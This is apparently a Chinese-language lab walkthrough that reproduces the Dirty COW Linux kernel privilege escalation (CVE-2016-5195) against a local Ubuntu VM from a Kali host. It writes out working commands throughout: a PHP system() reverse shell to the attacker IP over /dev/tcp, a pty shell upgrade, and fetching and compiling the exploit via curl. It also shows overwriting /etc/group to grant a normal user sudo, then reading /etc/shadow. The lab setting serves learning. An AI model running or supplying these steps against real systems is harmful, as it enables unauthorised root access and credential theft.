CVE-2016-5195(Dirty Cow脏牛)
脏牛提权的利用方式不同于其他的内核溢出提权,这里单独记录
脏牛是一个非常经典的内核提权漏洞,存在Linux内核中已经有长达9年的时间,在2007年发布的Linux内核版本中就已经存在此漏洞,在2016年10月18后才得以修复
Dirty COW漏洞原理与简单利用_dirtycow-CSDN博客
首先我们下载环境
我们的kail ip 192.168.25.138
Ubuntu ip 192.168.25.135
通过网盘分享的文件:Ubuntu.zip
链接: 百度网盘 请输入提取码 提取码: kru8
--来自百度网盘超级会员v3的分享
首先访问192.168.25.135
打开
eval函数
我们还是打开kail的反弹
system('bash -c "bash -i >& /dev/tcp/192.168.25.138/8888 0>&1"');
已经反弹回来了
还是一样的 修改为完整的tty shell
python3 -c 'import pty;pty.spawn("/bin/bash")';
我们在Ubuntu 新建普通用户
在kail反弹shell中查看
然后我们下载exp
DirtyCow(脏牛)漏洞复现 | Brucetg's Blog
首先
git clone https://github.com/dirtycow/dirtycow.github.io
然后打开http服务
python3 -m http.server 80
curl http://192.168.25.138/dirtyc0w.c -o /tmp/dirtyc0w.c
然后编译 增加权限
gcc -pthread dirtycow.c -o dirtycow
然后返回Ubuntu主机查看权限
然后输入
把用户加到sudo数组里 root
./dirtycow /etc/group "$(sed '/\(sudo*\)/ s/$/,hjl/' /etc/group)"
查看权限
发现多了sudo 权限
用普通用户的密码 拿下root
看到root 跟 hjl 权限一样了
我们输入cat /etc/shadow
权限不够 sudo来凑
还是可以访问的
我们脏牛 就复现成功了